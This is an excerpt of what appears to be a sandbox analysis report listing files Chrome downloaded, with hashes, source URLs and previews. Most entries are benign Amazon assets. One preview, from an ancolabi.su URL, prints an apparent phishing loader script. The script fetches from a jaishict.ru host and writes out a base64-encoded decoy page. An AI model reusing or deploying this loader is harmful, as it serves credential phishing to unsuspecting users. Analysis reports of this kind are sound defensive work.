c33%3Ddesktop-btf-grid-9-visible%26cf33%3D22517%26pc33%3D22518%26ld33%3D22518%26t33%3D1723469025516%26sc34%3Ddesktop-btf-grid-10-visible%26cf34%3D22531%26pc34%3D22531%26ld34%3D22531%26t34%3D1723469025529%26sc35%3Ddesktop-btf-grid-11-visible%26cf35%3D23092%26pc35%3D23092%26ld35%3D23092%26t35%3D1723469026090%26sc36%3Ddesktop-5-visible%26cf36%3D23155%26pc36%3D23155%26ld36%3D23155%26t36%3D1723469026153%26sc37%3Ddesktop-btf-grid-12-visible%26cf37%3D23683%26pc37%3D23683%26ld37%3D23683%26t37%3D1723469026681%26sc38%3Ddesktop-7-visible%26cf38%3D24316%26pc38%3D24316%26ld38%3D24316%26t38%3D1723469027314%26sc39%3Ddesktop-6-visible%26cf39%3D24508%26pc39%3D24508%26ld39%3D24508%26t39%3D1723469027506%26sc40%3Dhero-first-image%26cf40%3D24816%26pc40%3D24816%26ld40%3D24816%26t40%3D1723469027814%26sc41%3Dgateway-asset-load%26cf41%3D24860%26pc41%3D24860%26ld41%3D24860%26t41%3D1723469027858%26sc42%3DjQueryReady%26cf42%3D25248%26pc42%3D25248%26ld42%3D25248%26t42%3D1723469028246%26sc43%3DgwGridInit%26cf43%3D25250%26pc43%3D25250%26ld43%3D25250%26t43%3D1723469028248%26sc44%3DgwBTFGridInit%26cf44%3D25252%26pc44%3D25252%26ld44%3D25252%26t44%3D1723469028250%26sc45%3DgwLayoutReady%26cf45%3D25661%26pc45%3D25661%26ld45%3D25661%26t45%3D1723469028659%26sc46%3DgwAUIReady%26cf46%3D25663%26pc46%3D25663%26ld46%3D25663%26t46%3D1723469028661%26sc47%3Ddesktop-3-active%26cf47%3D25672%26pc47%3D25672%26ld47%3D25672%26t47%3D1723469028670%26sc48%3Ddesktop-4-active%26cf48%3D25672%26pc48%3D25672%26ld48%3D25672%26t48%3D1723469028670%26sc49%3Ddesktop-5-active%26cf49%3D25672%26pc49%3D25672%26ld49%3D25672%26t49%3D1723469028670%26sc50%3Ddesktop-6-active%26cf50%3D25673%26pc50%3D25673%26ld50%3D25673%26t50%3D1723469028671%26sc51%3Dgw-hero-btf-populate%26cf51%3D25735%26pc51%3D25735%26ld51%3D25735%26t51%3D1723469028733%26sc52%3DgwHerotatorActive%26cf52%3D25745%26pc52%3D25745%26ld52%3D25745%26t52%3D1723469028743%26sc53%3Dgw-ftGr-desktop-hero-5-visible%26cf53%3D26601%26pc53%3D26601%26ld53%3D26601%26t53%3D1723469029599%26sc54%3Dgw-ftGr-desktop-hero-2-visible%26cf54%3D39991%26pc54%3D39991%26ld54%3D39991%26t54%3D1723469042989%26sc55%3Dgw-ftGr-desktop-hero-4-visible%26cf55%3D40381%26pc55%3D40381%26ld55%3D40381%26t55%3D1723469043379%26sc56%3Dgw-ftGr-desktop-hero-3-visible%26cf56%3D40387%26pc56%3D40387%26ld56%3D40387%26t56%3D1723469043385%26sc57%3Dgw-ftGr-desktop-hero-6-visible%26cf57%3D40565%26pc57%3D40565%26ld57%3D40565%26t57%3D1723469043563%26ctb%3D1:41603
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):15406
                                                                                                                                                                                                                                                                Entropy (8bit):2.932954551863506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:M7yRB52gkEWMIII9UzVK+KZ72p56tQOPk9GPU5NX5uezdAhllSM0H:6/g9pviRw62F4SNX5K0
                                                                                                                                                                                                                                                                MD5:9D62DCC244C0F3D88367A943BA4D4FED
                                                                                                                                                                                                                                                                SHA1:5FC5EC953D4344422EB686B9FC61EA31CAED360E
                                                                                                                                                                                                                                                                SHA-256:FDDF75D3376BB911DB3189AA149F508317799B10611438B23D688B89DB208DA7
                                                                                                                                                                                                                                                                SHA-512:78CD9A7A2CDAFCC378A3CB1215325BE78D54A4459D5C4C7271DE617A272AAD10A951BD7F2EFE15EBF4E70A059420D988AC093C481AF02C788D864AA9E316DF22
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://url6.mailanyone.net/favicon.ico
                                                                                                                                                                                                                                                                Preview:............ .h...6... .... .(.......00.... .h&......(....... ..... .....................................................................................................................C!!.........................................................U**.G%..H% Y....................................................I%..G$..G%..UU..............................................F##.H$..G$..H$..N''.............................................H%..G$..G$..H%..............................................G&!6H$..G$..H$..L"".............................................H$..G$..G$..H%..%q.%r.%r.'o.'............................G'.VG$..G$..G%..U**.$q.~$q..$q..$q..3f..........................H$..G$..G$..I$.b.... ...$q..$q..$q..&q.s........................G$..G$..H$..UU..........$q.M$q..$q..$q..'l......................H% YG$..G#.A................%r.$q..$q..$r..................`..f.V2$\.q..q..q..q..q.>|.)$r..$q..$q..%s.>........j..j..j..j..j..j..j..j..j..k.(s.$q..$q..%q..@....jv.j..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):4900
                                                                                                                                                                                                                                                                Entropy (8bit):7.887023968160149
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TuzQ1O9euOQPmTnO6nRMcc1iNnSzD31Ex3nHu6/gC0P0SXl8HBPZ1v3:yzQ1O1PmTOQRMcc8NyenHu6YCS0SXsRN
                                                                                                                                                                                                                                                                MD5:8E268F798C04EF44DF4C8FA829B611D8
                                                                                                                                                                                                                                                                SHA1:C4888511D65D1D21FF89A4E2AB188E013F8F3189
                                                                                                                                                                                                                                                                SHA-256:ED3861B9A3D2FCD8BFFFE3F2FC893EB2544312668F03C286F5A874052127B9E8
                                                                                                                                                                                                                                                                SHA-512:209AA241964BC64290EF729E9980E23B6B95A107C399643B93C4DE032FF4722D66209AD10522CA17168D916A5F34F7E5699AB2D9755B4A715D0CDAB7DDA4DA7C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/813rUU6R6uL._AC_UL225_SR225,160_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..............................................................!1.."AQaq.#2....BRbr.$34........CS...............................................!A.1Q."2Baq.....#Rc..............?......" ...""...." ...""....4E..#.........%..<... ..R.........V.....V.|.I.-.7.n......]..l...oHv..CmU[@.[.5..3k..^....[4`..8..v....5..d.7........aR.DE ""...." ...""...." ...""...." .....B....e..cI.-.k......{.n.?..`..FD...(.../}.].+hT...i.....S`...DD....D@...DD....D@...DD..xM.(.Qx...v.G.7^..Qx...}.#G...}.8.aH-...`..."..=/..?........." ...""...." ...""..../**c.ng.-...S.....asf.......W.[...b<aW...7..q.u...UE^..$.T........pGr.l!.;......[)G".....k3.79.....k([.I^..Z0@n._p>.b..d E.{|N...AHs..S....'..}3K..........Bd..|mv.#......O..e|.<.=1......I9.v`..K"n..;GW.1.-o..cX.............uA..2.....$...V...=g..,3.2..j ....IWK.Qc&".K.......o
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 199x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):7638
                                                                                                                                                                                                                                                                Entropy (8bit):7.935740247494966
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:kqELHHuvmW3v+okJFl4mZGu9LVZDnhOl9o60QgB/FYgjbzi:qDMWZl4adbxB9pbzi
                                                                                                                                                                                                                                                                MD5:EF1958F6DFE20037B21938ADFBB79C0C
                                                                                                                                                                                                                                                                SHA1:D2EBD819088B0B347550E0B4A1200138F97044BA
                                                                                                                                                                                                                                                                SHA-256:7BE994BE4080AB371CC9E1D3511181E9A0BE393F8132DFDDE272C2DCA77AB066
                                                                                                                                                                                                                                                                SHA-512:1556A64BF1ECDFC15B8A1CDDEC0655244C60C8AE17D63AB4683A2F422B846CB96C491171079920EC2DAC23EB5CB89352E6DCA4326A7D28D40FBC72D0EFC7804F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/71JxdOlrA8L._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*...........".............................................................!1AQ..aq..."..........#2BR3Dbs.....4CSr.t...............................................1.!..2A..BQ."#R.a............?...ft..G6B.)KN.6L.-...5LT.8.qh...W.......H...Q....YIR.-if7I.f.]..l.].AS....*..uNiRtR...""...=...UB......*B...:Z]h^.....Ms.}.....(Iw,oV.e+..T5...ZI.E...+F,..x....=..]].k....J....-KH/,(e=....}...^N..U .V06RN`....d9..rq..P.T=,$(.......JqR.H...ku..(.M8UI...'.b.,q@\u.....5JoQG.....E,...HN+Z..9..*...jV.$.E*....5m.e..*<..h..&.3'...1Sm.%C.x....^..d<..z.......D.\.T.$.A...i~..Vu.Q..KU...L.D..[...+.HQ.@.j....|..Yu.I.Gx..3...|v5G.i^..Uu.&........M>*.@..4s:.....t.......5D..&.+......e./.........7.q....9.n....H6.M.ybd...2.(~...>.G.G.R..%.{.h$..~...":...&.<..0.H.~ho5EtU>.\DI....Y./r..~...}ll..M.d..n..y.3=Z;...G...R.D.}...J.....%"p
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (700)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):11064
                                                                                                                                                                                                                                                                Entropy (8bit):5.441770530180272
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:ZGvlbAoUi6Dg2E5WhZzhlldp9DYBzL1XunwBwHZJwV20z9jy+5gtPRmy3zWD1o56:Z2lzUib52VlD9MBzL1XunqU70ZeAgtJ0
                                                                                                                                                                                                                                                                MD5:61FBE1FD8BDA9F4C5831EF41949F3103
                                                                                                                                                                                                                                                                SHA1:51486CA39D68E3CA2F71C5EC45EBFFE822452669
                                                                                                                                                                                                                                                                SHA-256:44DE0115C98F76788D4432A94F09B481D9339F5E4053017801E06C59F3EA9E18
                                                                                                                                                                                                                                                                SHA-512:E2C365799A9C00B59FE03C24AB090405AE496F069F49612E1930700A0249748BAC8B234DA8038362EB087E7D3DDAB665E0042541E165A88F2865380F248077AA
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/I/31PW3lLCbrL.js?xcp
                                                                                                                                                                                                                                                                Preview:'use strict';mix_d("P13NSCCards__p13n-rvi:p13n-rvi__6bjMpsfo","exports tslib @p/A @c/metrics @c/aui-carousel @c/dom @c/remote-operations @c/scoped-dom @p/a-carousel-framework @c/logger @c/aui-untrusted-ajax @c/browser-operations".split(" "),function(B,u,G,y,H,I,J,K,L,M,N,O){function w(a){return a&&"object"===typeof a&&"default"in a?a:{"default":a}}var n=w(G),P=w(H),Q=w(J),v=w(K),R=w(L),x=w(M),S=w(N),T=w(O),C={},z=function(a,d,b){void 0===d&&(d="");void 0===b&&(b=1);d=a+d;C.hasOwnProperty(d)||(C[d]=.!0,y.count(a,(y.count(a)||0)+b))},U=function(a){z(n["default"].capabilities.mobile?"Card:EERU:SharedLib:mobile:render":"Card:EERU:SharedLib:desktop:render");var d=function(c,e){c={$event:{preventDefault:n["default"].$.noop,stopPropagation:n["default"].$.noop},$target:c.getContent().find('[data-a-tab-name="'+e+'"]'),data:{name:"energyEfficiencyTabSet"}};n["default"].trigger("a:declarative:a-tabs:click",c)},b=function(c,e){var h=c&&c.$event,f=c&&c.data||{},p=f.activeTabName,l=f.modalHeight,r=f
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (570)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):131437
                                                                                                                                                                                                                                                                Entropy (8bit):5.540783290092949
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:AqFarXxC3oTgbWZZRwi+vIsef+ixcxox0UIxrxyxEvUFtkU9Jx:1aDLgUBgIL7Jx
                                                                                                                                                                                                                                                                MD5:E11C95A7327FA979233BFC6BC41D7BD9
                                                                                                                                                                                                                                                                SHA1:B8BFC896A46AF83FF44E6A2C51BB406C3AB6623A
                                                                                                                                                                                                                                                                SHA-256:37770391714B7B35CBAAFF47F2810743BF2BE5E6C6BE36AA8F20E9C38B747772
                                                                                                                                                                                                                                                                SHA-512:D70A7C82F0E87F23ECC259A256B3613E098F5C93B52644366E05FA22248BDF09C6E5F951F34C04BCBD63B1079323184A2ECC481BCE4617A304556F42B7CF94B3
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://m.media-amazon.com/images/I/51GRfnCRJBL._RC%7C01B3Yme5dLL.js,01j5DeZSMzL.js,31CuRA-rQfL.js,51M-SaPaAgL.js,21lWdirzT4L.js,21PK6GRj7eL.js_.js?AUIClients/FreshMerchandisedContentAssets&S0LTWP6e"
                                                                                                                                                                                                                                                                Preview:(function(q){var x=window.AmazonUIPageJS||window.P,F=x._namespace||x.attributeErrors,A=F?F("QuantitySelectorAssets",""):x;A.guardFatal?A.guardFatal(q)(A,window):A.execute(function(){q(A,window)})})(function(q,x,F){function A(n){var f=!1;q.now(n).execute("qsAssetDuplicationGuard",function(a){f=!!a});return f}function L(n,f){if(!A(n))try{q.register(n,f)}catch(a){if(!a.message.includes("reregistered by QuantitySelectorAssets"))throw a;}}function Da(){var n=arguments;return{register:function(f,a){if(!A(f))try{q.when.apply(q,.n).register(f,a)}catch(c){if(!c.message.includes("reregistered by QuantitySelectorAssets"))throw c;}},execute:function(f,a){q.when.apply(q,n).execute(f,a)}}}L("QSAssetDuplicationGuard",function(){return{register:L,when:Da}});"use strict";q.when("QSAssetDuplicationGuard").execute("qsAUIDeps-main-duplication-guard",function(n){n.when("A","QuantitySelectorConstants","a-util").execute("qsAUIDeps-main",function(f,a,c){function h(){w&&w.enableCheckoutCompatibility&&g()}funct
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:99EW8DTCPK04PDBCDQEK$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3D99EW8DTCPK04PDBCDQEK%26ic%3D2%26m%3D1%26sc%3Dcsa%3Avl50%26vl50%3D744%26pc%3D5707%26at%3D5707%26t%3D1723469093784%26pty%3DFreshMerchandisedContent%26spty%3Dlearn-more%26pti%3Dlearn-more%26tid%3D99EW8DTCPK04PDBCDQEK%26aftb%3D1%26lob%3D1:5706
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (17041), with CRLF line terminators
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):17396
                                                                                                                                                                                                                                                                Entropy (8bit):5.81536800191453
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:XfJnoG5ZvGSGq2rwrbXcmqRil0FmK81y8ASPMIQyS:PeG5Z+rwrbXFl0UK8dAq9FS
                                                                                                                                                                                                                                                                MD5:F70F3ADC4D3292686AD924C5E98FF209
                                                                                                                                                                                                                                                                SHA1:995C0E9035903F44EF5BD76B7F549AF1297C25DF
                                                                                                                                                                                                                                                                SHA-256:BFB5EDC10BA0FC858CB411529F11C4EB542258D9795C346C03239BB312952C44
                                                                                                                                                                                                                                                                SHA-512:7D4DA7E7E6F914F299B41940AE9A54D1532224BD4E89A69F5B57F2EA399CDECED55613C011F35495BF9D56223238155B945FF872071E8B825F7DAEE74F75CD1B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://nkoc4.ancolabi.su/YOBEzWvY/
                                                                                                                                                                                                                                                                Preview:<script>fetch('https://IiC.jaishict.ru/pitpuuzhnmxqkshihrkpdjjmzyQNhrLDWZIJAADSBTPAPAJPLCDIIUZ', {..method: "GET",..}).then(response => {..return response.text()..}).then(text => {..if(text == 0){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+RGV0ZXJtaW5pbmcgdGhlIEJyZWFrLWV2ZW4gUG9pbnQ8L3RpdGxlPg0
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4810
                                                                                                                                                                                                                                                                Entropy (8bit):7.775698101522166
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TLZzTyTbSIjBF8C/Ls5/K+j7RuKt+7FFF+EcnfpOvfBMPFKfbErNapVcPtHPi4v1:pmSeBzg5yW7p3zovfBMPFKAcylrv2mff
                                                                                                                                                                                                                                                                MD5:4147D56383C45598FDF7F96AB21508D6
                                                                                                                                                                                                                                                                SHA1:44F9432C4A492D49FF6F042551EFC3619CF310F6
                                                                                                                                                                                                                                                                SHA-256:450EDE7176FDA5976AFBFB7527F550E62461156A025BFFC3F21A0A0E873D1C5F
                                                                                                                                                                                                                                                                SHA-512:2D7885BB7E053245005353009EA77E59E1CD10A3A76FE6BB92E84D53609661D54CF8CD8C814434E72CB2A180B349D2830D7C978D417A46ACE0457F6346538ACD
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3................................................................`........................|.]..e....g.l_......M..Q.i.....3..H...z.+ ....@...y...:..b....u....#.."....i?.p^.....cR...e..il......W..\N.M..v...O..C9.D.`.%.L.t.....W...Y...m..hl.............~z.]..S.J@.Z3.RQ.S.i..eLw,.|lg)..q>..Cr&...k.....*...g....*....O...dk.v0\......~..x.5.w~.{...._.M..:......[.tc.WV...ka.\..a9d..i.r... ..z....=.!7..e...o........\.Vc=...._..t._..}]L.Y..=...|...V.q8.0....[..fl........#..l.8..U..Z.9.>o.{..C....A7..g....r...$..f..........'{(a...q...G.N.q"C]....QS{S6...$.9Q..,.C.....]e...........*7.t)G.z..^.E..QE..Qz..^................................/.........................4....!013."#2.CABQ`p................<\g...D....@q..t....@q..t.V.-t.|.8.#..{..X....Z....Nu]B..Y..y.>... .W+..a.|i..(.....|5).~~.x."tw..X"..X=
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (33677)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):33722
                                                                                                                                                                                                                                                                Entropy (8bit):5.505158473326853
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:IQHxQlhfD/EKGzY+4b4tdyXmeI8Nr71aO:repEjYXmeTN/1aO
                                                                                                                                                                                                                                                                MD5:0A3A58F308CD683A742C13B16D3BC35B
                                                                                                                                                                                                                                                                SHA1:1C175D968B6892D6B431B5F40309C844E654D580
                                                                                                                                                                                                                                                                SHA-256:B0DDAAD28F9246458C037B59F4BA5620A8432C6BE41B10B235E36B42B665ECFA
                                                                                                                                                                                                                                                                SHA-512:F7335935529D9517B1934E907B1F62AE7577AB091341F590B808D936AB610839F7D945CFCAC7A33FFA0ABEFCA91ADE98014BDF8259C180F8B328EC1F3C5BF0EC
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:(this["webpackJsonpvp-webapp-clicksmart"]=this["webpackJsonpvp-webapp-clicksmart"]||[]).push([[4],{443:function(e,t,n){"use strict";var a=n(460);n.d(t,"AnalysisErrorCode",(function(){return a.a}));var c=n(461);n.o(c,"ScannerStep")&&n.d(t,"ScannerStep",(function(){return c.ScannerStep})),n.o(c,"Verdict")&&n.d(t,"Verdict",(function(){return c.Verdict}));var r=n(462);n.o(r,"ScannerStep")&&n.d(t,"ScannerStep",(function(){return r.ScannerStep})),n.o(r,"Verdict")&&n.d(t,"Verdict",(function(){return r.Verdict}));var i=n(463);n.o(i,"ScannerStep")&&n.d(t,"ScannerStep",(function(){return i.ScannerStep})),n.o(i,"Verdict")&&n.d(t,"Verdict",(function(){return i.Verdict}));var s=n(464);n.o(s,"ScannerStep")&&n.d(t,"ScannerStep",(function(){return s.ScannerStep})),n.o(s,"Verdict")&&n.d(t,"Verdict",(function(){return s.Verdict}));var o=n(465);n.d(t,"ScannerStep",(function(){return o.a}));var l=n(466);n.d(t,"Verdict",(function(){return l.a}))},460:function(e,t,n){"use strict";var a;n.d(t,"a",(function()
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:PNG image data, 136 x 104, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):5861
                                                                                                                                                                                                                                                                Entropy (8bit):7.941819196061047
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:s5LS1YmLYIid4UFrn782yy57rQflsr4971/SauFVE26HrKYz0L/aw8oBXMZc1gXx:UEYYYIidFR78MnQ9C4971Sx/6HGYz+/6
                                                                                                                                                                                                                                                                MD5:661F95800A801676A279D066C3C8114E
                                                                                                                                                                                                                                                                SHA1:C495A9B59AFD9B35A08C12513D40B8C7E7771499
                                                                                                                                                                                                                                                                SHA-256:849C8F9A22736A09D7C0C7981842D932777B5A0056CBA7DF41997C49D536225D
                                                                                                                                                                                                                                                                SHA-512:A42EC4D0051537ED8B7BD27150E4FEA8F688C3B5FF6FAB2EF03B64492DE8033517AE019F72855102BE5F4405E537A5600F987331B2B2D30F81F37FEB251FFB03
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.PNG........IHDR.......h.....*.......gAMA......a....:iCCPPhotoshop ICC profile..H...wTT....wz..0.)C.. .7..Da..`(..34.!...ED..A."..."."...`... ..`.QQy3.Vt.....g}k...=g.}.......tX..4.....J....c........`.23.B=.H>.n.L..."..7w.+.7....t..I...........d..P....}F....1.(1.E..........";....c.X|..v.[.=".%....qQ...-.[".L..qE.V...af.."....+I."&..B.D....).+........Rn...|nb........2...T.@`..d.0.l.[zZ......?KF\[....f...F..f_..n.M.{.H..?....}..._z=..YQmv|.....c3.....4.. ).[..W....%I .31...6.rX.......7.......(..........S.|zf.....y..q._..0....sx..p.qy..v..\.7.G...S..a..8."Q.>.j.1......>.....s@....7.|8.......,...e.%...9.-$............H.*P.*@...#`.l.=p......0..V..H.i...A>...@...v.jP..@.h.'@.8.....:..n..`....`......a!2D.. UH.2..!...y@.P....A....B..&..*...:....:.]..B..=h...~....L...2............p"......p.\.......u.6<.?.g........!....D......C..J..iA..^.&2.L#.P...EG...Q..(.j5j...U.:.jG..n.FQ3.Oh2Z.m..C..#..lt....nC_B.F...`0..F.c...Da.1k0....V.y. f.3..b...X.l ...`..{...C.q.[..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 74x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):3350
                                                                                                                                                                                                                                                                Entropy (8bit):7.86708632298549
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TCIYdqcGk+czw2Y48mXlQrnXzMGCWiZNTWlMcwZ8TZZV:edqxZcf8mXlQrnjMG7iZIVpTHV
                                                                                                                                                                                                                                                                MD5:5CE8116F96F841352FB8A5E031961041
                                                                                                                                                                                                                                                                SHA1:3D23B2A1BEA12F0E009B42C60A310F75423E02D2
